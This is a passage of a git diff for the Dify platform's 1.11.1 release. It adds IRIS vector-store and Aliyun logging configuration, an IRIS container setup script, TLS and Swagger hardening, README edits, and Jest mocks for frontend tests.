VECTOR_INDEX_NAME_PREFIX=Vector_index @@ -792,6 +792,21 @@ CLICKZETTA_ANALYZER_TYPE=chinese CLICKZETTA_ANALYZER_MODE=smart CLICKZETTA_VECTOR_DISTANCE_FUNCTION=cosine_distance +# InterSystems IRIS configuration, only available when VECTOR_STORE is `iris` +IRIS_HOST=iris +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en +IRIS_TIMEZONE=UTC + # ------------------------------ # Knowledge Configuration # ------------------------------ @@ -1029,6 +1044,25 @@ WORKFLOW_LOG_RETENTION_DAYS=30 # Batch size for workflow log cleanup operations (default: 100) WORKFLOW_LOG_CLEANUP_BATCH_SIZE=100 +# Aliyun SLS Logstore Configuration +# Aliyun Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Number of days to retain workflow run logs (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both SLS LogStore and SQL database (default: false) +LOGSTORE_DUAL_WRITE_ENABLED=false +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true + # HTTP request node in workflow configuration HTTP_REQUEST_NODE_MAX_BINARY_SIZE=10485760 HTTP_REQUEST_NODE_MAX_TEXT_SIZE=1048576 @@ -1214,7 +1248,7 @@ NGINX_SSL_PORT=443 # and modify the env vars below accordingly. NGINX_SSL_CERT_FILENAME=dify.crt NGINX_SSL_CERT_KEY_FILENAME=dify.key -NGINX_SSL_PROTOCOLS=TLSv1.1 TLSv1.2 TLSv1.3 +NGINX_SSL_PROTOCOLS=TLSv1.2 TLSv1.3 # Nginx performance tuning NGINX_WORKER_PROCESSES=auto @@ -1335,7 +1369,10 @@ PLUGIN_STDIO_BUFFER_SIZE=1024 PLUGIN_STDIO_MAX_BUFFER_SIZE=5242880 PLUGIN_PYTHON_ENV_INIT_TIMEOUT=120 +# Plugin Daemon side timeout (configure to match the API side below) PLUGIN_MAX_EXECUTION_TIMEOUT=600 +# API side timeout (configure to match the Plugin Daemon side above) +PLUGIN_DAEMON_TIMEOUT=600.0 # PIP_MIRROR_URL=https://pypi.tuna.tsinghua.edu.cn/simple PIP_MIRROR_URL= @@ -1406,7 +1443,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) @@ -1433,5 +1470,21 @@ WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK=0 # Tenant isolated task queue configuration TENANT_ISOLATED_TASK_CONCURRENCY=1 +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + # The API key of amplitude AMPLITUDE_API_KEY= + +# Sandbox expired records clean configuration +SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD=21 +SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE=1000 +SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS=30 diff --git a/docker/docker-compose-template.yaml b/docker/docker-compose-template.yaml index c89224fa8a..a07ed9e8ad 100644 --- a/docker/docker-compose-template.yaml +++ b/docker/docker-compose-template.yaml @@ -21,7 +21,7 @@ services: # API service api: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -34,6 +34,7 @@ services: PLUGIN_REMOTE_INSTALL_HOST: ${EXPOSE_PLUGIN_DEBUGGING_HOST:-localhost} PLUGIN_REMOTE_INSTALL_PORT: ${EXPOSE_PLUGIN_DEBUGGING_PORT:-5003} PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: init_permissions: @@ -62,7 +63,7 @@ services: # worker service # The Celery worker for processing all queues (dataset, workflow, mail, etc.) worker: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -101,7 +102,7 @@ services: # worker_beat service # Celery beat for scheduling periodic tasks. worker_beat: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -131,7 +132,7 @@ services: # Frontend web application. web: - image: langgenius/dify-web:1.11.0 + image: langgenius/dify-web:1.11.1 restart: always environment: CONSOLE_API_URL: ${CONSOLE_API_URL:-} @@ -414,7 +415,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -648,6 +649,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 68f5726797..24e1077ebe 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -361,6 +361,19 @@ x-shared-env: &shared-api-worker-env CLICKZETTA_ANALYZER_TYPE: ${CLICKZETTA_ANALYZER_TYPE:-chinese} CLICKZETTA_ANALYZER_MODE: ${CLICKZETTA_ANALYZER_MODE:-smart} CLICKZETTA_VECTOR_DISTANCE_FUNCTION: ${CLICKZETTA_VECTOR_DISTANCE_FUNCTION:-cosine_distance} + IRIS_HOST: ${IRIS_HOST:-iris} + IRIS_SUPER_SERVER_PORT: ${IRIS_SUPER_SERVER_PORT:-1972} + IRIS_WEB_SERVER_PORT: ${IRIS_WEB_SERVER_PORT:-52773} + IRIS_USER: ${IRIS_USER:-_SYSTEM} + IRIS_PASSWORD: ${IRIS_PASSWORD:-Dify@1234} + IRIS_DATABASE: ${IRIS_DATABASE:-USER} + IRIS_SCHEMA: ${IRIS_SCHEMA:-dify} + IRIS_CONNECTION_URL: ${IRIS_CONNECTION_URL:-} + IRIS_MIN_CONNECTION: ${IRIS_MIN_CONNECTION:-1} + IRIS_MAX_CONNECTION: ${IRIS_MAX_CONNECTION:-3} + IRIS_TEXT_INDEX: ${IRIS_TEXT_INDEX:-true} + IRIS_TEXT_INDEX_LANGUAGE: ${IRIS_TEXT_INDEX_LANGUAGE:-en} + IRIS_TIMEZONE: ${IRIS_TIMEZONE:-UTC} UPLOAD_FILE_SIZE_LIMIT: ${UPLOAD_FILE_SIZE_LIMIT:-15} UPLOAD_FILE_BATCH_LIMIT: ${UPLOAD_FILE_BATCH_LIMIT:-5} UPLOAD_FILE_EXTENSION_BLACKLIST: ${UPLOAD_FILE_EXTENSION_BLACKLIST:-} @@ -442,6 +455,14 @@ x-shared-env: &shared-api-worker-env WORKFLOW_LOG_CLEANUP_ENABLED: ${WORKFLOW_LOG_CLEANUP_ENABLED:-false} WORKFLOW_LOG_RETENTION_DAYS: ${WORKFLOW_LOG_RETENTION_DAYS:-30} WORKFLOW_LOG_CLEANUP_BATCH_SIZE: ${WORKFLOW_LOG_CLEANUP_BATCH_SIZE:-100} + ALIYUN_SLS_ACCESS_KEY_ID: ${ALIYUN_SLS_ACCESS_KEY_ID:-} + ALIYUN_SLS_ACCESS_KEY_SECRET: ${ALIYUN_SLS_ACCESS_KEY_SECRET:-} + ALIYUN_SLS_ENDPOINT: ${ALIYUN_SLS_ENDPOINT:-} + ALIYUN_SLS_REGION: ${ALIYUN_SLS_REGION:-} + ALIYUN_SLS_PROJECT_NAME: ${ALIYUN_SLS_PROJECT_NAME:-} + ALIYUN_SLS_LOGSTORE_TTL: ${ALIYUN_SLS_LOGSTORE_TTL:-365} + LOGSTORE_DUAL_WRITE_ENABLED: ${LOGSTORE_DUAL_WRITE_ENABLED:-false} + LOGSTORE_DUAL_READ_ENABLED: ${LOGSTORE_DUAL_READ_ENABLED:-true} HTTP_REQUEST_NODE_MAX_BINARY_SIZE: ${HTTP_REQUEST_NODE_MAX_BINARY_SIZE:-10485760} HTTP_REQUEST_NODE_MAX_TEXT_SIZE: ${HTTP_REQUEST_NODE_MAX_TEXT_SIZE:-1048576} HTTP_REQUEST_NODE_SSL_VERIFY: ${HTTP_REQUEST_NODE_SSL_VERIFY:-True} @@ -515,7 +536,7 @@ x-shared-env: &shared-api-worker-env NGINX_SSL_PORT: ${NGINX_SSL_PORT:-443} NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -570,6 +591,7 @@ x-shared-env: &shared-api-worker-env PLUGIN_STDIO_MAX_BUFFER_SIZE: ${PLUGIN_STDIO_MAX_BUFFER_SIZE:-5242880} PLUGIN_PYTHON_ENV_INIT_TIMEOUT: ${PLUGIN_PYTHON_ENV_INIT_TIMEOUT:-120} PLUGIN_MAX_EXECUTION_TIMEOUT: ${PLUGIN_MAX_EXECUTION_TIMEOUT:-600} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} PIP_MIRROR_URL: ${PIP_MIRROR_URL:-} PLUGIN_STORAGE_TYPE: ${PLUGIN_STORAGE_TYPE:-local} PLUGIN_STORAGE_LOCAL_ROOT: ${PLUGIN_STORAGE_LOCAL_ROOT:-/app/storage} @@ -618,7 +640,7 @@ x-shared-env: &shared-api-worker-env QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200} QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-} QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30} - SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true} + SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false} SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html} DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true} DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0} @@ -635,7 +657,16 @@ x-shared-env: &shared-api-worker-env WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE: ${WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE:-100} WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK: ${WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK:-0} TENANT_ISOLATED_TASK_CONCURRENCY: ${TENANT_ISOLATED_TASK_CONCURRENCY:-1} + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: ${ANNOTATION_IMPORT_FILE_SIZE_LIMIT:-2} + ANNOTATION_IMPORT_MAX_RECORDS: ${ANNOTATION_IMPORT_MAX_RECORDS:-10000} + ANNOTATION_IMPORT_MIN_RECORDS: ${ANNOTATION_IMPORT_MIN_RECORDS:-1} + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:-5} + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:-20} + ANNOTATION_IMPORT_MAX_CONCURRENT: ${ANNOTATION_IMPORT_MAX_CONCURRENT:-5} AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} + SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD: ${SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD:-21} + SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE: ${SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE:-1000} + SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS: ${SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS:-30} services: # Init container to fix permissions @@ -659,7 +690,7 @@ services: # API service api: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -672,6 +703,7 @@ services: PLUGIN_REMOTE_INSTALL_HOST: ${EXPOSE_PLUGIN_DEBUGGING_HOST:-localhost} PLUGIN_REMOTE_INSTALL_PORT: ${EXPOSE_PLUGIN_DEBUGGING_PORT:-5003} PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: init_permissions: @@ -700,7 +732,7 @@ services: # worker service # The Celery worker for processing all queues (dataset, workflow, mail, etc.) worker: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -739,7 +771,7 @@ services: # worker_beat service # Celery beat for scheduling periodic tasks. worker_beat: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -769,7 +801,7 @@ services: # Frontend web application. web: - image: langgenius/dify-web:1.11.0 + image: langgenius/dify-web:1.11.1 restart: always environment: CONSOLE_API_URL: ${CONSOLE_API_URL:-} @@ -1052,7 +1084,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -1286,6 +1318,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/iris/docker-entrypoint.sh b/docker/iris/docker-entrypoint.sh new file mode 100755 index 0000000000..067bfa03e2 --- /dev/null +++ b/docker/iris/docker-entrypoint.sh @@ -0,0 +1,38 @@ +#!/bin/bash +set -e + +# IRIS configuration flag file +IRIS_CONFIG_DONE="/opt/iris/.iris-configured" + +# Function to configure IRIS +configure_iris() { + echo "Configuring IRIS for first-time setup..." + + # Wait for IRIS to be fully started + sleep 5 + + # Execute the initialization script + iris session IRIS < /iris-init.script + + # Mark configuration as done + touch "$IRIS_CONFIG_DONE" + + echo "IRIS configuration completed." +} + +# Start IRIS in background for initial configuration if not already configured +if [ ! -f "$IRIS_CONFIG_DONE" ]; then + echo "First-time IRIS setup detected. Starting IRIS for configuration..." + + # Start IRIS + iris start IRIS + + # Configure IRIS + configure_iris + + # Stop IRIS + iris stop IRIS quietly +fi + +# Run the original IRIS entrypoint +exec /iris-main "$@" diff --git a/docker/iris/iris-init.script b/docker/iris/iris-init.script new file mode 100644 index 0000000000..c41fcf4efb --- /dev/null +++ b/docker/iris/iris-init.script @@ -0,0 +1,11 @@ +// Switch to the %SYS namespace to modify system settings +set $namespace="%SYS" + +// Set predefined user passwords to never expire (default password: SYS) +Do ##class(Security.Users).UnExpireUserPasswords("*") + +// Change the default password  +Do $SYSTEM.Security.ChangePassword("_SYSTEM","Dify@1234") + +// Install the Japanese locale (default is English since the container is Ubuntu-based) +// Do ##class(Config.NLS.Locales).Install("jpuw") diff --git a/docker/middleware.env.example b/docker/middleware.env.example index d4cbcd1762..f7e0252a6f 100644 --- a/docker/middleware.env.example +++ b/docker/middleware.env.example @@ -213,3 +213,24 @@ PLUGIN_VOLCENGINE_TOS_ENDPOINT= PLUGIN_VOLCENGINE_TOS_ACCESS_KEY= PLUGIN_VOLCENGINE_TOS_SECRET_KEY= PLUGIN_VOLCENGINE_TOS_REGION= + +# ------------------------------ +# Environment Variables for Aliyun SLS (Simple Log Service) +# ------------------------------ +# Aliyun SLS Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun SLS Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Aliyun SLS Logstore TTL (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both LogStore and SQL database (default: true) +LOGSTORE_DUAL_WRITE_ENABLED=true +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true \ No newline at end of file diff --git a/docs/fr-FR/README.md b/docs/fr-FR/README.md index 03f3221798..291c8dab40 100644 --- a/docs/fr-FR/README.md +++ b/docs/fr-FR/README.md @@ -61,14 +61,14 @@

langgenius%2Fdify | Trendshift

-Dify est une plateforme de développement d'applications LLM open source. Son interface intuitive combine un flux de travail d'IA, un pipeline RAG, des capacités d'agent, une gestion de modèles, des fonctionnalités d'observabilité, et plus encore, vous permettant de passer rapidement du prototype à la production. Voici une liste des fonctionnalités principales: +Dify est une plateforme de développement d'applications LLM open source. Sa interface intuitive combine un flux de travail d'IA, un pipeline RAG, des capacités d'agent, une gestion de modèles, des fonctionnalités d'observabilité, et plus encore, vous permettant de passer rapidement du prototype à la production. Voici une liste des fonctionnalités principales:

**1. Flux de travail** : Construisez et testez des flux de travail d'IA puissants sur un canevas visuel, en utilisant toutes les fonctionnalités suivantes et plus encore. **2. Prise en charge complète des modèles** : -Intégration transparente avec des centaines de LLM propriétaires / open source provenant de dizaines de fournisseurs d'inférence et de solutions auto-hébergées, couvrant GPT, Mistral, Llama3, et tous les modèles compatibles avec l'API OpenAI. Une liste complète des fournisseurs de modèles pris en charge se trouve [ici](https://docs.dify.ai/getting-started/readme/model-providers). +Intégration transparente avec des centaines de LLM propriétaires / open source offerts par dizaines de fournisseurs d'inférence et de solutions auto-hébergées, couvrant GPT, Mistral, Llama3, et tous les modèles compatibles avec l'API OpenAI. Une liste complète des fournisseurs de modèles pris en charge se trouve [ici](https://docs.dify.ai/getting-started/readme/model-providers). ![providers-v5](https://github.com/langgenius/dify/assets/13230914/5a17bdbe-097a-4100-8363-40255b70f6e3) @@ -79,7 +79,7 @@ Interface intuitive pour créer des prompts, comparer les performances des modè Des capacités RAG étendues qui couvrent tout, de l'ingestion de documents à la récupération, avec un support prêt à l'emploi pour l'extraction de texte à partir de PDF, PPT et autres formats de document courants. **5. Capacités d'agent** : -Vous pouvez définir des agents basés sur l'appel de fonction LLM ou ReAct, et ajouter des outils pré-construits ou personnalisés pour l'agent. Dify fournit plus de 50 outils intégrés pour les agents d'IA, tels que la recherche Google, DALL·E, Stable Diffusion et WolframAlpha. +Vous pouvez définir des agents basés sur l'appel de fonctions LLM ou ReAct, et ajouter des outils pré-construits ou personnalisés pour l'agent. Dify fournit plus de 50 outils intégrés pour les agents d'IA, tels que la recherche Google, DALL·E, Stable Diffusion et WolframAlpha. **6. LLMOps** : Surveillez et analysez les journaux d'application et les performances au fil du temps. Vous pouvez continuellement améliorer les prompts, les ensembles de données et les modèles en fonction des données de production et des annotations. diff --git a/.cursorrules b/web/AGENTS.md similarity index 61% rename from .cursorrules rename to web/AGENTS.md index cdfb8b17a3..7362cd51db 100644 --- a/.cursorrules +++ b/web/AGENTS.md @@ -1,6 +1,5 @@ -# Cursor Rules for Dify Project - ## Automated Test Generation - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. - When proposing or saving tests, re-read that document and follow every requirement. +- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance. diff --git a/web/CLAUDE.md b/web/CLAUDE.md new file mode 120000 index 0000000000..47dc3e3d86 --- /dev/null +++ b/web/CLAUDE.md @@ -0,0 +1 @@ +AGENTS.md \ No newline at end of file diff --git a/web/__mocks__/ky.ts b/web/__mocks__/ky.ts new file mode 100644 index 0000000000..6c7691f2cf --- /dev/null +++ b/web/__mocks__/ky.ts @@ -0,0 +1,71 @@ +/** + * Mock for ky HTTP client + * This mock is used to avoid ESM issues in Jest tests + */ + +type KyResponse = { + ok: boolean + status: number + statusText: string + headers: Headers + json: jest.Mock + text: jest.Mock + blob: jest.Mock + arrayBuffer: jest.Mock + clone: jest.Mock +} + +type KyInstance = jest.Mock & { + get: jest.Mock + post: jest.Mock + put: jest.Mock + patch: jest.Mock + delete: jest.Mock + head: jest.Mock + create: jest.Mock + extend: jest.Mock + stop: symbol +} + +const createResponse = (data: unknown = {}, status = 200): KyResponse => { + const response: KyResponse = { + ok: status >= 200 && status < 300, + status, + statusText: status === 200 ? 'OK' : 'Error', + headers: new Headers(), + json: jest.fn().mockResolvedValue(data), + text: jest.fn().mockResolvedValue(JSON.stringify(data)), + blob: jest.fn().mockResolvedValue(new Blob()), + arrayBuffer: jest.fn().mockResolvedValue(new ArrayBuffer(0)), + clone: jest.fn(), + } + // Ensure clone returns a new response-like object, not the same instance + response.clone.mockImplementation(() => createResponse(data, status)) + return response +} + +const createKyInstance = (): KyInstance => { + const instance = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) as KyInstance + + // HTTP methods + instance.get = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.post = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.put = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.patch = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.delete = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.head = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + + // Create new instance with custom options + instance.create = jest.fn().mockImplementation(() => createKyInstance()) + instance.extend = jest.fn().mockImplementation(() => createKyInstance()) + + // Stop method for AbortController + instance.stop = Symbol('stop') + + return instance +} + +const ky = createKyInstance() + +export default ky +export { ky } diff --git a/web/__mocks__/react-i18next.ts b/web/__mocks__/react-i18next.ts new file mode 100644 index 0000000000..1e3f58927e --- /dev/null +++ b/web/__mocks__/react-i18next.ts @@ -0,0 +1,40 @@ +/** + * Shared mock for react-i18next + * + * Jest automatically uses this mock when react-i18next is imported in tests. + * The default behavior returns the translation key as-is, which is suitable + * for most test scenarios. + * + * For tests that need custom translations, you can override with jest.mock(): + * + * @example + * jest.mock('react-i18next', () => ({ + * useTranslation: () => ({ + * t: (key: string) => { + * if (key === 'some.key') return 'Custom translation' + * return key + * }, + * }), + * })) + */ + +export const useTranslation = () => ({ + t: (key: string, options?: Record) => { + if (options?.returnObjects) + return [`${key}-feature-1`, `${key}-feature-2`] + if (options) + return `${key}:${JSON.stringify(options)}` + return key + }, + i18n: { + language: 'en', + changeLanguage: jest.fn(), + }, +}) + +export const Trans = ({ children }: { children?: React.ReactNode }) => children + +export const initReactI18next = { + type: '3rdParty', + init: jest.fn(), +} diff --git a/web/__tests__/embedded-user-id-auth.test.tsx b/web/__tests__/embedded-user-id-auth.test.tsx index 5c3c3c943f..9d6734b120 100644 --- a/web/__tests__/embedded-user-id-auth.test.tsx +++ b/web/__tests__/embedded-user-id-auth.test.tsx @@ -4,12 +4,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react' import MailAndPasswordAuth from '@/app/(shareLayout)/webapp-signin/components/mail-and-password-auth' import CheckCode from '@/app/(shareLayout)/webapp-signin/check-code/page' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - const replaceMock = jest.fn() const backMock = jest.fn() diff --git a/web/__tests__/goto-anything/command-selector.test.tsx b/web/__tests__/goto-anything/command-selector.test.tsx index 6d4e045d49..e502c533bb 100644 --- a/web/__tests__/goto-anything/command-selector.test.tsx +++ b/web/__tests__/goto-anything/command-selector.test.tsx @@ -4,12 +4,6 @@ import '@testing-library/jest-dom' import CommandSelector from '../../app/components/goto-anything/command-selector' import type { ActionItem } from '../../app/components/goto-anything/actions/types' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - jest.mock('cmdk', () => ({ Command: { Group: ({ children, className }: any) =>
{children}
, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx index 1f836de6e6..d5e3c61932 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx @@ -16,7 +16,7 @@ import { import { useTranslation } from 'react-i18next' import { useShallow } from 'zustand/react/shallow' import s from './style.module.css' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useStore } from '@/app/components/app/store' import AppSideBar from '@/app/components/app-sidebar' import type { NavIcon } from '@/app/components/app-sidebar/navLink' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx index 2bfdece433..dda5dff2b9 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx @@ -3,7 +3,7 @@ import { 